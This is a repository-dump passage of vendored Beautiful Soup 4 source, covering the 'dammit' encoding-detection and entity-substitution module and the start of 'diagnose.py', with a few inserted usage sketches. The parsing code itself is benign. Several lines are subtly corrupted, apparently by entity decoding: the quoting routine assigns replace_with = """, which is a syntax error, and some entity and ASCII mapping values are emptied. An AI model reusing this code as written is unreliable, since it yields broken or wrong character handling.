67 | characters_for_re.append(character)
68 | lookup[character] = name
69 | # But we do want to turn &quot; into the quotation mark.
70 | reverse_lookup[name] = character
71 | re_definition = "[%s]" % "".join(characters_for_re)
72 | return lookup, reverse_lookup, re.compile(re_definition)
73 | (CHARACTER_TO_HTML_ENTITY, HTML_ENTITY_TO_CHARACTER,
74 | CHARACTER_TO_HTML_ENTITY_RE) = _populate_class_variables()
75 |
76 | CHARACTER_TO_XML_ENTITY = {
77 | "'": "apos",
78 | '"': "quot",
79 | "&": "amp",
80 | "<": "lt",
81 | ">": "gt",
82 | }
83 |
84 | BARE_AMPERSAND_OR_BRACKET = re.compile("([<>]|"
85 | "&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)"
86 | ")")
87 |
88 | AMPERSAND_OR_BRACKET = re.compile("([<>&])")
89 |
90 | @classmethod
91 | def _substitute_html_entity(cls, matchobj):
92 | entity = cls.CHARACTER_TO_HTML_ENTITY.get(matchobj.group(0))
93 | return "&%s;" % entity
94 |
95 | @classmethod
96 | def _substitute_xml_entity(cls, matchobj):
97 | """Used with a regular expression to substitute the
98 | appropriate XML entity for an XML special character."""
99 | entity = cls.CHARACTER_TO_XML_ENTITY[matchobj.group(0)]
100 | return "&%s;" % entity
101 |
102 | @classmethod
103 | def quoted_attribute_value(self, value):
104 | """Make a value into a quoted XML attribute, possibly escaping it.
105 |
106 | Most strings will be quoted using double quotes.
107 |
108 | Bob's Bar -> "Bob's Bar"
109 |
110 | If a string contains double quotes, it will be quoted using
111 | single quotes.
112 |
113 | Welcome to "my bar" -> 'Welcome to "my bar"'
114 |
115 | If a string contains both single and double quotes, the
116 | double quotes will be escaped, and the string will be quoted
117 | using double quotes.
118 |
119 | Welcome to "Bob's Bar" -> "Welcome to &quot;Bob's bar&quot;"
120 | """
121 | quote_with = '"'
122 | if '"' in value:
123 | if "'" in value:
124 | # The string contains both single and double
125 | # quotes. Turn the double quotes into
126 | # entities. We quote the double quotes rather than
127 | # the single quotes because the entity name is
128 | # """ whether this is HTML or XML. If we
129 | # quoted the single quotes, we'd have to decide
130 | # between ' and &squot;.
131 | replace_with = """
132 | value = value.replace('"', replace_with)
133 | else:
134 | # There are double quotes but no single quotes.
135 | # We can use single quotes to quote the attribute.
136 | quote_with = "'"
137 | return quote_with + value + quote_with
138 |
139 | @classmethod
140 | def substitute_xml(cls, value, make_quoted_attribute=False):
141 | """Substitute XML entities for special XML characters.
142 |
143 | :param value: A string to be substituted. The less-than sign
144 | will become &lt;, the greater-than sign will become &gt;,
145 | and any ampersands will become &amp;. If you want ampersands
146 | that appear to be part of an entity definition to be left
147 | alone, use substitute_xml_containing_entities() instead.
148 |
149 | :param make_quoted_attribute: If True, then the string will be
150 | quoted, as befits an attribute value.
151 | """
152 | # Escape angle brackets and ampersands.
153 | value = cls.AMPERSAND_OR_BRACKET.sub(
154 | cls._substitute_xml_entity, value)
155 |
156 | if make_quoted_attribute:
157 | value = cls.quoted_attribute_value(value)
158 | return value
159 |
160 | @classmethod
161 | def substitute_xml_containing_entities(
162 | cls, value, make_quoted_attribute=False):
163 | """Substitute XML entities for special XML characters.
164 |
165 | :param value: A string to be substituted. The less-than sign will
166 | become &lt;, the greater-than sign will become &gt;, and any
167 | ampersands that are not part of an entity definition will
168 | become &amp;.
169 |
170 | :param make_quoted_attribute: If True, then the string will be
171 | quoted, as befits an attribute value.
172 | """
173 | # Escape angle brackets, and ampersands that aren't part of
174 | # entities.
175 | value = cls.BARE_AMPERSAND_OR_BRACKET.sub(
176 | cls._substitute_xml_entity, value)
177 |
178 | if make_quoted_attribute:
179 | value = cls.quoted_attribute_value(value)
180 | return value
181 |
182 | @classmethod
183 | def substitute_html(cls, s):
184 | """Replace certain Unicode characters with named HTML entities.
185 |
186 | This differs from data.encode(encoding, 'xmlcharrefreplace')
187 | in that the goal is to make the result more readable (to those
188 | with ASCII displays) rather than to recover from
189 | errors. There's absolutely nothing wrong with a UTF-8 string
190 | containing a LATIN SMALL LETTER E WITH ACUTE, but replacing that
191 | character with "&eacute;" will make it more readable to some
192 | people.
193 | """
194 | return cls.CHARACTER_TO_HTML_ENTITY_RE.sub(
195 | cls._substitute_html_entity, s)
196 |
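# --- Editor's note: illustrative usage sketch, not part of the vendored file. ---
#
#     from lib.bs4.dammit import EntitySubstitution
#     EntitySubstitution.substitute_xml("AT&T", make_quoted_attribute=True)
#     # => '"AT&amp;T"'
#     EntitySubstitution.substitute_html(u"caf\xe9")
#     # => u'caf&eacute;'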
197 |
198 | class EncodingDetector:
199 | """Suggests a number of possible encodings for a bytestring.
200 |
201 | Order of precedence:
202 |
203 | 1. Encodings you specifically tell EncodingDetector to try first
204 | (the override_encodings argument to the constructor).
205 |
206 | 2. An encoding declared within the bytestring itself, either in an
207 | XML declaration (if the bytestring is to be interpreted as an XML
208 | document), or in a tag (if the bytestring is to be
209 | interpreted as an HTML document.)
210 |
211 | 3. An encoding detected through textual analysis by chardet,
212 | cchardet, or a similar external library.
213 |
214 | 4. UTF-8.
215 |
216 | 5. Windows-1252.
217 | """
218 | def __init__(self, markup, override_encodings=None, is_html=False,
219 | exclude_encodings=None):
220 | self.override_encodings = override_encodings or []
221 | exclude_encodings = exclude_encodings or []
222 | self.exclude_encodings = set([x.lower() for x in exclude_encodings])
223 | self.chardet_encoding = None
224 | self.is_html = is_html
225 | self.declared_encoding = None
226 |
227 | # First order of business: strip a byte-order mark.
228 | self.markup, self.sniffed_encoding = self.strip_byte_order_mark(markup)
229 |
230 | def _usable(self, encoding, tried):
231 | if encoding is not None:
232 | encoding = encoding.lower()
233 | if encoding in self.exclude_encodings:
234 | return False
235 | if encoding not in tried:
236 | tried.add(encoding)
237 | return True
238 | return False
239 |
240 | @property
241 | def encodings(self):
242 | """Yield a number of encodings that might work for this markup."""
243 | tried = set()
244 | for e in self.override_encodings:
245 | if self._usable(e, tried):
246 | yield e
247 |
248 | # Did the document originally start with a byte-order mark
249 | # that indicated its encoding?
250 | if self._usable(self.sniffed_encoding, tried):
251 | yield self.sniffed_encoding
252 |
253 | # Look within the document for an XML or HTML encoding
254 | # declaration.
255 | if self.declared_encoding is None:
256 | self.declared_encoding = self.find_declared_encoding(
257 | self.markup, self.is_html)
258 | if self._usable(self.declared_encoding, tried):
259 | yield self.declared_encoding
260 |
261 | # Use third-party character set detection to guess at the
262 | # encoding.
263 | if self.chardet_encoding is None:
264 | self.chardet_encoding = chardet_dammit(self.markup)
265 | if self._usable(self.chardet_encoding, tried):
266 | yield self.chardet_encoding
267 |
268 | # As a last-ditch effort, try utf-8 and windows-1252.
269 | for e in ('utf-8', 'windows-1252'):
270 | if self._usable(e, tried):
271 | yield e
272 |
273 | @classmethod
274 | def strip_byte_order_mark(cls, data):
275 | """If a byte-order mark is present, strip it and return the encoding it implies."""
276 | encoding = None
277 | if isinstance(data, unicode):
278 | # Unicode data cannot have a byte-order mark.
279 | return data, encoding
280 | if (len(data) >= 4) and (data[:2] == b'\xfe\xff') \
281 | and (data[2:4] != '\x00\x00'):
282 | encoding = 'utf-16be'
283 | data = data[2:]
284 | elif (len(data) >= 4) and (data[:2] == b'\xff\xfe') \
285 | and (data[2:4] != '\x00\x00'):
286 | encoding = 'utf-16le'
287 | data = data[2:]
288 | elif data[:3] == b'\xef\xbb\xbf':
289 | encoding = 'utf-8'
290 | data = data[3:]
291 | elif data[:4] == b'\x00\x00\xfe\xff':
292 | encoding = 'utf-32be'
293 | data = data[4:]
294 | elif data[:4] == b'\xff\xfe\x00\x00':
295 | encoding = 'utf-32le'
296 | data = data[4:]
297 | return data, encoding
298 |
299 | @classmethod
300 | def find_declared_encoding(cls, markup, is_html=False, search_entire_document=False):
301 | """Given a document, tries to find its declared encoding.
302 |
303 | An XML encoding is declared at the beginning of the document.
304 |
305 | An HTML encoding is declared in a <meta> tag, hopefully near the
306 | beginning of the document.
307 | """
308 | if search_entire_document:
309 | xml_endpos = html_endpos = len(markup)
310 | else:
311 | xml_endpos = 1024
312 | html_endpos = max(2048, int(len(markup) * 0.05))
313 |
314 | declared_encoding = None
315 | declared_encoding_match = xml_encoding_re.search(markup, endpos=xml_endpos)
316 | if not declared_encoding_match and is_html:
317 | declared_encoding_match = html_meta_re.search(markup, endpos=html_endpos)
318 | if declared_encoding_match is not None:
319 | declared_encoding = declared_encoding_match.groups()[0].decode(
320 | 'ascii', 'replace')
321 | if declared_encoding:
322 | return declared_encoding.lower()
323 | return None
324 |
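# --- Editor's note: illustrative usage sketch, not part of the vendored file. ---
# The encodings property yields candidates in the precedence order documented
# above; here the XML declaration supplies the first usable guess:
#
#     from lib.bs4.dammit import EncodingDetector
#     detector = EncodingDetector(b'<?xml version="1.0" encoding="latin-1"?><a/>')
#     list(detector.encodings)
#     # => ['latin-1', <chardet guess, if installed>, 'utf-8', 'windows-1252']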
325 | class UnicodeDammit:
326 | """A class for detecting the encoding of a *ML document and
327 | converting it to a Unicode string. If the source encoding is
328 | windows-1252, can replace MS smart quotes with their HTML or XML
329 | equivalents."""
330 |
331 | # This dictionary maps commonly seen values for "charset" in HTML
332 | # meta tags to the corresponding Python codec names. It only covers
333 | # values that aren't in Python's aliases and can't be determined
334 | # by the heuristics in find_codec.
335 | CHARSET_ALIASES = {"macintosh": "mac-roman",
336 | "x-sjis": "shift-jis"}
337 |
338 | ENCODINGS_WITH_SMART_QUOTES = [
339 | "windows-1252",
340 | "iso-8859-1",
341 | "iso-8859-2",
342 | ]
343 |
344 | def __init__(self, markup, override_encodings=[],
345 | smart_quotes_to=None, is_html=False, exclude_encodings=[]):
346 | self.smart_quotes_to = smart_quotes_to
347 | self.tried_encodings = []
348 | self.contains_replacement_characters = False
349 | self.is_html = is_html
350 | self.log = logging.getLogger(__name__)
351 | self.detector = EncodingDetector(
352 | markup, override_encodings, is_html, exclude_encodings)
353 |
354 | # Short-circuit if the data is in Unicode to begin with.
355 | if isinstance(markup, unicode) or markup == '':
356 | self.markup = markup
357 | self.unicode_markup = unicode(markup)
358 | self.original_encoding = None
359 | return
360 |
361 | # The encoding detector may have stripped a byte-order mark.
362 | # Use the stripped markup from this point on.
363 | self.markup = self.detector.markup
364 |
365 | u = None
366 | for encoding in self.detector.encodings:
367 | markup = self.detector.markup
368 | u = self._convert_from(encoding)
369 | if u is not None:
370 | break
371 |
372 | if not u:
373 | # None of the encodings worked. As an absolute last resort,
374 | # try them again with character replacement.
375 |
376 | for encoding in self.detector.encodings:
377 | if encoding != "ascii":
378 | u = self._convert_from(encoding, "replace")
379 | if u is not None:
380 | self.log.warning(
381 | "Some characters could not be decoded, and were "
382 | "replaced with REPLACEMENT CHARACTER."
383 | )
384 | self.contains_replacement_characters = True
385 | break
386 |
387 | # If none of that worked, we could at this point force it to
388 | # ASCII, but that would destroy so much data that I think
389 | # giving up is better.
390 | self.unicode_markup = u
391 | if not u:
392 | self.original_encoding = None
393 |
394 | def _sub_ms_char(self, match):
395 | """Changes a MS smart quote character to an XML or HTML
396 | entity, or an ASCII character."""
397 | orig = match.group(1)
398 | if self.smart_quotes_to == 'ascii':
399 | sub = self.MS_CHARS_TO_ASCII.get(orig).encode()
400 | else:
401 | sub = self.MS_CHARS.get(orig)
402 | if type(sub) == tuple:
403 | if self.smart_quotes_to == 'xml':
404 | sub = '&#x'.encode() + sub[1].encode() + ';'.encode()
405 | else:
406 | sub = '&'.encode() + sub[0].encode() + ';'.encode()
407 | else:
408 | sub = sub.encode()
409 | return sub
410 |
411 | def _convert_from(self, proposed, errors="strict"):
412 | proposed = self.find_codec(proposed)
413 | if not proposed or (proposed, errors) in self.tried_encodings:
414 | return None
415 | self.tried_encodings.append((proposed, errors))
416 | markup = self.markup
417 | # Convert smart quotes to HTML if coming from an encoding
418 | # that might have them.
419 | if (self.smart_quotes_to is not None
420 | and proposed in self.ENCODINGS_WITH_SMART_QUOTES):
421 | smart_quotes_re = b"([\x80-\x9f])"
422 | smart_quotes_compiled = re.compile(smart_quotes_re)
423 | markup = smart_quotes_compiled.sub(self._sub_ms_char, markup)
424 |
425 | try:
426 | #print "Trying to convert document to %s (errors=%s)" % (
427 | # proposed, errors)
428 | u = self._to_unicode(markup, proposed, errors)
429 | self.markup = u
430 | self.original_encoding = proposed
431 | except Exception as e:
432 | #print "That didn't work!"
433 | #print e
434 | return None
435 | #print "Correct encoding: %s" % proposed
436 | return self.markup
437 |
438 | def _to_unicode(self, data, encoding, errors="strict"):
439 | '''Given a string and its encoding, decodes the string into Unicode.
440 | %encoding is a string recognized by encodings.aliases'''
441 | return unicode(data, encoding, errors)
442 |
443 | @property
444 | def declared_html_encoding(self):
445 | if not self.is_html:
446 | return None
447 | return self.detector.declared_encoding
448 |
449 | def find_codec(self, charset):
450 | value = (self._codec(self.CHARSET_ALIASES.get(charset, charset))
451 | or (charset and self._codec(charset.replace("-", "")))
452 | or (charset and self._codec(charset.replace("-", "_")))
453 | or (charset and charset.lower())
454 | or charset
455 | )
456 | if value:
457 | return value.lower()
458 | return None
459 |
460 | def _codec(self, charset):
461 | if not charset:
462 | return charset
463 | codec = None
464 | try:
465 | codecs.lookup(charset)
466 | codec = charset
467 | except (LookupError, ValueError):
468 | pass
469 | return codec
470 |
471 |
472 | # A partial mapping of ISO-Latin-1 to HTML entities/XML numeric entities.
473 | MS_CHARS = {b'\x80': ('euro', '20AC'),
474 | b'\x81': ' ',
475 | b'\x82': ('sbquo', '201A'),
476 | b'\x83': ('fnof', '192'),
477 | b'\x84': ('bdquo', '201E'),
478 | b'\x85': ('hellip', '2026'),
479 | b'\x86': ('dagger', '2020'),
480 | b'\x87': ('Dagger', '2021'),
481 | b'\x88': ('circ', '2C6'),
482 | b'\x89': ('permil', '2030'),
483 | b'\x8A': ('Scaron', '160'),
484 | b'\x8B': ('lsaquo', '2039'),
485 | b'\x8C': ('OElig', '152'),
486 | b'\x8D': '?',
487 | b'\x8E': ('#x17D', '17D'),
488 | b'\x8F': '?',
489 | b'\x90': '?',
490 | b'\x91': ('lsquo', '2018'),
491 | b'\x92': ('rsquo', '2019'),
492 | b'\x93': ('ldquo', '201C'),
493 | b'\x94': ('rdquo', '201D'),
494 | b'\x95': ('bull', '2022'),
495 | b'\x96': ('ndash', '2013'),
496 | b'\x97': ('mdash', '2014'),
497 | b'\x98': ('tilde', '2DC'),
498 | b'\x99': ('trade', '2122'),
499 | b'\x9a': ('scaron', '161'),
500 | b'\x9b': ('rsaquo', '203A'),
501 | b'\x9c': ('oelig', '153'),
502 | b'\x9d': '?',
503 | b'\x9e': ('#x17E', '17E'),
504 | b'\x9f': ('Yuml', ''),}
505 |
506 | # A parochial partial mapping of ISO-Latin-1 to ASCII. Contains
507 | # horrors like stripping diacritical marks to turn á into a, but also
508 | # contains non-horrors like turning “ into ".
509 | MS_CHARS_TO_ASCII = {
510 | b'\x80' : 'EUR',
511 | b'\x81' : ' ',
512 | b'\x82' : ',',
513 | b'\x83' : 'f',
514 | b'\x84' : ',,',
515 | b'\x85' : '...',
516 | b'\x86' : '+',
517 | b'\x87' : '++',
518 | b'\x88' : '^',
519 | b'\x89' : '%',
520 | b'\x8a' : 'S',
521 | b'\x8b' : '<',
522 | b'\x8c' : 'OE',
523 | b'\x8d' : '?',
524 | b'\x8e' : 'Z',
525 | b'\x8f' : '?',
526 | b'\x90' : '?',
527 | b'\x91' : "'",
528 | b'\x92' : "'",
529 | b'\x93' : '"',
530 | b'\x94' : '"',
531 | b'\x95' : '*',
532 | b'\x96' : '-',
533 | b'\x97' : '--',
534 | b'\x98' : '~',
535 | b'\x99' : '(TM)',
536 | b'\x9a' : 's',
537 | b'\x9b' : '>',
538 | b'\x9c' : 'oe',
539 | b'\x9d' : '?',
540 | b'\x9e' : 'z',
541 | b'\x9f' : 'Y',
542 | b'\xa0' : ' ',
543 | b'\xa1' : '!',
544 | b'\xa2' : 'c',
545 | b'\xa3' : 'GBP',
546 | b'\xa4' : '$', #This approximation is especially parochial--this is the
547 | #generic currency symbol.
548 | b'\xa5' : 'YEN',
549 | b'\xa6' : '|',
550 | b'\xa7' : 'S',
551 | b'\xa8' : '..',
552 | b'\xa9' : '',
553 | b'\xaa' : '(th)',
554 | b'\xab' : '<<',
555 | b'\xac' : '!',
556 | b'\xad' : ' ',
557 | b'\xae' : '(R)',
558 | b'\xaf' : '-',
559 | b'\xb0' : 'o',
560 | b'\xb1' : '+-',
561 | b'\xb2' : '2',
562 | b'\xb3' : '3',
563 | b'\xb4' : ("'", 'acute'),
564 | b'\xb5' : 'u',
565 | b'\xb6' : 'P',
566 | b'\xb7' : '*',
567 | b'\xb8' : ',',
568 | b'\xb9' : '1',
569 | b'\xba' : '(th)',
570 | b'\xbb' : '>>',
571 | b'\xbc' : '1/4',
572 | b'\xbd' : '1/2',
573 | b'\xbe' : '3/4',
574 | b'\xbf' : '?',
575 | b'\xc0' : 'A',
576 | b'\xc1' : 'A',
577 | b'\xc2' : 'A',
578 | b'\xc3' : 'A',
579 | b'\xc4' : 'A',
580 | b'\xc5' : 'A',
581 | b'\xc6' : 'AE',
582 | b'\xc7' : 'C',
583 | b'\xc8' : 'E',
584 | b'\xc9' : 'E',
585 | b'\xca' : 'E',
586 | b'\xcb' : 'E',
587 | b'\xcc' : 'I',
588 | b'\xcd' : 'I',
589 | b'\xce' : 'I',
590 | b'\xcf' : 'I',
591 | b'\xd0' : 'D',
592 | b'\xd1' : 'N',
593 | b'\xd2' : 'O',
594 | b'\xd3' : 'O',
595 | b'\xd4' : 'O',
596 | b'\xd5' : 'O',
597 | b'\xd6' : 'O',
598 | b'\xd7' : '*',
599 | b'\xd8' : 'O',
600 | b'\xd9' : 'U',
601 | b'\xda' : 'U',
602 | b'\xdb' : 'U',
603 | b'\xdc' : 'U',
604 | b'\xdd' : 'Y',
605 | b'\xde' : 'b',
606 | b'\xdf' : 'B',
607 | b'\xe0' : 'a',
608 | b'\xe1' : 'a',
609 | b'\xe2' : 'a',
610 | b'\xe3' : 'a',
611 | b'\xe4' : 'a',
612 | b'\xe5' : 'a',
613 | b'\xe6' : 'ae',
614 | b'\xe7' : 'c',
615 | b'\xe8' : 'e',
616 | b'\xe9' : 'e',
617 | b'\xea' : 'e',
618 | b'\xeb' : 'e',
619 | b'\xec' : 'i',
620 | b'\xed' : 'i',
621 | b'\xee' : 'i',
622 | b'\xef' : 'i',
623 | b'\xf0' : 'o',
624 | b'\xf1' : 'n',
625 | b'\xf2' : 'o',
626 | b'\xf3' : 'o',
627 | b'\xf4' : 'o',
628 | b'\xf5' : 'o',
629 | b'\xf6' : 'o',
630 | b'\xf7' : '/',
631 | b'\xf8' : 'o',
632 | b'\xf9' : 'u',
633 | b'\xfa' : 'u',
634 | b'\xfb' : 'u',
635 | b'\xfc' : 'u',
636 | b'\xfd' : 'y',
637 | b'\xfe' : 'b',
638 | b'\xff' : 'y',
639 | }
640 |
641 | # A map used when removing rogue Windows-1252/ISO-8859-1
642 | # characters in otherwise UTF-8 documents.
643 | #
644 | # Note that \x81, \x8d, \x8f, \x90, and \x9d are undefined in
645 | # Windows-1252.
646 | WINDOWS_1252_TO_UTF8 = {
647 | 0x80 : b'\xe2\x82\xac', # €
648 | 0x82 : b'\xe2\x80\x9a', # ‚
649 | 0x83 : b'\xc6\x92', # ƒ
650 | 0x84 : b'\xe2\x80\x9e', # „
651 | 0x85 : b'\xe2\x80\xa6', # …
652 | 0x86 : b'\xe2\x80\xa0', # †
653 | 0x87 : b'\xe2\x80\xa1', # ‡
654 | 0x88 : b'\xcb\x86', # ˆ
655 | 0x89 : b'\xe2\x80\xb0', # ‰
656 | 0x8a : b'\xc5\xa0', # Š
657 | 0x8b : b'\xe2\x80\xb9', # ‹
658 | 0x8c : b'\xc5\x92', # Œ
659 | 0x8e : b'\xc5\xbd', # Ž
660 | 0x91 : b'\xe2\x80\x98', # ‘
661 | 0x92 : b'\xe2\x80\x99', # ’
662 | 0x93 : b'\xe2\x80\x9c', # “
663 | 0x94 : b'\xe2\x80\x9d', # ”
664 | 0x95 : b'\xe2\x80\xa2', # •
665 | 0x96 : b'\xe2\x80\x93', # –
666 | 0x97 : b'\xe2\x80\x94', # —
667 | 0x98 : b'\xcb\x9c', # ˜
668 | 0x99 : b'\xe2\x84\xa2', # ™
669 | 0x9a : b'\xc5\xa1', # š
670 | 0x9b : b'\xe2\x80\xba', # ›
671 | 0x9c : b'\xc5\x93', # œ
672 | 0x9e : b'\xc5\xbe', # ž
673 | 0x9f : b'\xc5\xb8', # Ÿ
674 | 0xa0 : b'\xc2\xa0', #
675 | 0xa1 : b'\xc2\xa1', # ¡
676 | 0xa2 : b'\xc2\xa2', # ¢
677 | 0xa3 : b'\xc2\xa3', # £
678 | 0xa4 : b'\xc2\xa4', # ¤
679 | 0xa5 : b'\xc2\xa5', # ¥
680 | 0xa6 : b'\xc2\xa6', # ¦
681 | 0xa7 : b'\xc2\xa7', # §
682 | 0xa8 : b'\xc2\xa8', # ¨
683 | 0xa9 : b'\xc2\xa9', # ©
684 | 0xaa : b'\xc2\xaa', # ª
685 | 0xab : b'\xc2\xab', # «
686 | 0xac : b'\xc2\xac', # ¬
687 | 0xad : b'\xc2\xad', #
688 | 0xae : b'\xc2\xae', # ®
689 | 0xaf : b'\xc2\xaf', # ¯
690 | 0xb0 : b'\xc2\xb0', # °
691 | 0xb1 : b'\xc2\xb1', # ±
692 | 0xb2 : b'\xc2\xb2', # ²
693 | 0xb3 : b'\xc2\xb3', # ³
694 | 0xb4 : b'\xc2\xb4', # ´
695 | 0xb5 : b'\xc2\xb5', # µ
696 | 0xb6 : b'\xc2\xb6', # ¶
697 | 0xb7 : b'\xc2\xb7', # ·
698 | 0xb8 : b'\xc2\xb8', # ¸
699 | 0xb9 : b'\xc2\xb9', # ¹
700 | 0xba : b'\xc2\xba', # º
701 | 0xbb : b'\xc2\xbb', # »
702 | 0xbc : b'\xc2\xbc', # ¼
703 | 0xbd : b'\xc2\xbd', # ½
704 | 0xbe : b'\xc2\xbe', # ¾
705 | 0xbf : b'\xc2\xbf', # ¿
706 | 0xc0 : b'\xc3\x80', # À
707 | 0xc1 : b'\xc3\x81', # Á
708 | 0xc2 : b'\xc3\x82', # Â
709 | 0xc3 : b'\xc3\x83', # Ã
710 | 0xc4 : b'\xc3\x84', # Ä
711 | 0xc5 : b'\xc3\x85', # Å
712 | 0xc6 : b'\xc3\x86', # Æ
713 | 0xc7 : b'\xc3\x87', # Ç
714 | 0xc8 : b'\xc3\x88', # È
715 | 0xc9 : b'\xc3\x89', # É
716 | 0xca : b'\xc3\x8a', # Ê
717 | 0xcb : b'\xc3\x8b', # Ë
718 | 0xcc : b'\xc3\x8c', # Ì
719 | 0xcd : b'\xc3\x8d', # Í
720 | 0xce : b'\xc3\x8e', # Î
721 | 0xcf : b'\xc3\x8f', # Ï
722 | 0xd0 : b'\xc3\x90', # Ð
723 | 0xd1 : b'\xc3\x91', # Ñ
724 | 0xd2 : b'\xc3\x92', # Ò
725 | 0xd3 : b'\xc3\x93', # Ó
726 | 0xd4 : b'\xc3\x94', # Ô
727 | 0xd5 : b'\xc3\x95', # Õ
728 | 0xd6 : b'\xc3\x96', # Ö
729 | 0xd7 : b'\xc3\x97', # ×
730 | 0xd8 : b'\xc3\x98', # Ø
731 | 0xd9 : b'\xc3\x99', # Ù
732 | 0xda : b'\xc3\x9a', # Ú
733 | 0xdb : b'\xc3\x9b', # Û
734 | 0xdc : b'\xc3\x9c', # Ü
735 | 0xdd : b'\xc3\x9d', # Ý
736 | 0xde : b'\xc3\x9e', # Þ
737 | 0xdf : b'\xc3\x9f', # ß
738 | 0xe0 : b'\xc3\xa0', # à
739 | 0xe1 : b'\xc3\xa1', # á
740 | 0xe2 : b'\xc3\xa2', # â
741 | 0xe3 : b'\xc3\xa3', # ã
742 | 0xe4 : b'\xc3\xa4', # ä
743 | 0xe5 : b'\xc3\xa5', # å
744 | 0xe6 : b'\xc3\xa6', # æ
745 | 0xe7 : b'\xc3\xa7', # ç
746 | 0xe8 : b'\xc3\xa8', # è
747 | 0xe9 : b'\xc3\xa9', # é
748 | 0xea : b'\xc3\xaa', # ê
749 | 0xeb : b'\xc3\xab', # ë
750 | 0xec : b'\xc3\xac', # ì
751 | 0xed : b'\xc3\xad', # í
752 | 0xee : b'\xc3\xae', # î
753 | 0xef : b'\xc3\xaf', # ï
754 | 0xf0 : b'\xc3\xb0', # ð
755 | 0xf1 : b'\xc3\xb1', # ñ
756 | 0xf2 : b'\xc3\xb2', # ò
757 | 0xf3 : b'\xc3\xb3', # ó
758 | 0xf4 : b'\xc3\xb4', # ô
759 | 0xf5 : b'\xc3\xb5', # õ
760 | 0xf6 : b'\xc3\xb6', # ö
761 | 0xf7 : b'\xc3\xb7', # ÷
762 | 0xf8 : b'\xc3\xb8', # ø
763 | 0xf9 : b'\xc3\xb9', # ù
764 | 0xfa : b'\xc3\xba', # ú
765 | 0xfb : b'\xc3\xbb', # û
766 | 0xfc : b'\xc3\xbc', # ü
767 | 0xfd : b'\xc3\xbd', # ý
768 | 0xfe : b'\xc3\xbe', # þ
769 | }
770 |
771 | MULTIBYTE_MARKERS_AND_SIZES = [
772 | (0xc2, 0xdf, 2), # 2-byte characters start with a byte C2-DF
773 | (0xe0, 0xef, 3), # 3-byte characters start with E0-EF
774 | (0xf0, 0xf4, 4), # 4-byte characters start with F0-F4
775 | ]
776 |
777 | FIRST_MULTIBYTE_MARKER = MULTIBYTE_MARKERS_AND_SIZES[0][0]
778 | LAST_MULTIBYTE_MARKER = MULTIBYTE_MARKERS_AND_SIZES[-1][1]
779 |
780 | @classmethod
781 | def detwingle(cls, in_bytes, main_encoding="utf8",
782 | embedded_encoding="windows-1252"):
783 | """Fix characters from one encoding embedded in some other encoding.
784 |
785 | Currently the only situation supported is Windows-1252 (or its
786 | subset ISO-8859-1), embedded in UTF-8.
787 |
788 | The input must be a bytestring. If you've already converted
789 | the document to Unicode, you're too late.
790 |
791 | The output is a bytestring in which `embedded_encoding`
792 | characters have been converted to their `main_encoding`
793 | equivalents.
794 | """
795 | if embedded_encoding.replace('_', '-').lower() not in (
796 | 'windows-1252', 'windows_1252'):
797 | raise NotImplementedError(
798 | "Windows-1252 and ISO-8859-1 are the only currently supported "
799 | "embedded encodings.")
800 |
801 | if main_encoding.lower() not in ('utf8', 'utf-8'):
802 | raise NotImplementedError(
803 | "UTF-8 is the only currently supported main encoding.")
804 |
805 | byte_chunks = []
806 |
807 | chunk_start = 0
808 | pos = 0
809 | while pos < len(in_bytes):
810 | byte = in_bytes[pos]
811 | if not isinstance(byte, int):
812 | # Python 2.x
813 | byte = ord(byte)
814 | if (byte >= cls.FIRST_MULTIBYTE_MARKER
815 | and byte <= cls.LAST_MULTIBYTE_MARKER):
816 | # This is the start of a UTF-8 multibyte character. Skip
817 | # to the end.
818 | for start, end, size in cls.MULTIBYTE_MARKERS_AND_SIZES:
819 | if byte >= start and byte <= end:
820 | pos += size
821 | break
822 | elif byte >= 0x80 and byte in cls.WINDOWS_1252_TO_UTF8:
823 | # We found a Windows-1252 character!
824 | # Save the string up to this point as a chunk.
825 | byte_chunks.append(in_bytes[chunk_start:pos])
826 |
827 | # Now translate the Windows-1252 character into UTF-8
828 | # and add it as another, one-byte chunk.
829 | byte_chunks.append(cls.WINDOWS_1252_TO_UTF8[byte])
830 | pos += 1
831 | chunk_start = pos
832 | else:
833 | # Go on to the next character.
834 | pos += 1
835 | if chunk_start == 0:
836 | # The string is unchanged.
837 | return in_bytes
838 | else:
839 | # Store the final chunk.
840 | byte_chunks.append(in_bytes[chunk_start:])
841 | return b''.join(byte_chunks)
842 |
843 |
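# --- Editor's note: illustrative usage sketch, not part of the vendored file. ---
#
#     from lib.bs4 import UnicodeDammit
#     dammit = UnicodeDammit(b"Sacr\xe9 bleu!")
#     print dammit.unicode_markup      # u'Sacré bleu!' (if detection succeeds)
#     print dammit.original_encoding   # whichever candidate encoding worked
#
# detwingle() repairs Windows-1252 bytes pasted into otherwise-UTF-8 data
# *before* it is decoded:
#
#     utf8_part = u"\N{SNOWMAN}".encode("utf8")
#     cp1252_part = u"\N{LEFT DOUBLE QUOTATION MARK}Hi!".encode("windows_1252")
#     UnicodeDammit.detwingle(utf8_part + cp1252_part).decode("utf8")  # decodes cleanly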
--------------------------------------------------------------------------------
/weeman/lib/bs4/diagnose.py:
--------------------------------------------------------------------------------
1 | """Diagnostic functions, mainly for use when doing tech support."""
2 |
3 | # Use of this source code is governed by a BSD-style license that can be
4 | # found in the LICENSE file.
5 | __license__ = "MIT"
6 |
7 | import cProfile
8 | from StringIO import StringIO
9 | from HTMLParser import HTMLParser
10 | import lib.bs4
11 | from lib.bs4 import BeautifulSoup, __version__
12 | from lib.bs4.builder import builder_registry
13 |
14 | import os
15 | import pstats
16 | import random
17 | import tempfile
18 | import time
19 | import traceback
20 | import sys
21 | import cProfile
22 |
23 | def diagnose(data):
24 | """Diagnostic suite for isolating common problems."""
25 | print "Diagnostic running on Beautiful Soup %s" % __version__
26 | print "Python version %s" % sys.version
27 |
28 | basic_parsers = ["html.parser", "html5lib", "lxml"]
29 | for name in basic_parsers:
30 | for builder in builder_registry.builders:
31 | if name in builder.features:
32 | break
33 | else:
34 | basic_parsers.remove(name)
35 | print (
36 | "I noticed that %s is not installed. Installing it may help." %
37 | name)
38 |
39 | if 'lxml' in basic_parsers:
40 | basic_parsers.append(["lxml", "xml"])
41 | try:
42 | from lxml import etree
43 | print "Found lxml version %s" % ".".join(map(str,etree.LXML_VERSION))
44 | except ImportError, e:
45 | print (
46 | "lxml is not installed or couldn't be imported.")
47 |
48 |
49 | if 'html5lib' in basic_parsers:
50 | try:
51 | import html5lib
52 | print "Found html5lib version %s" % html5lib.__version__
53 | except ImportError, e:
54 | print (
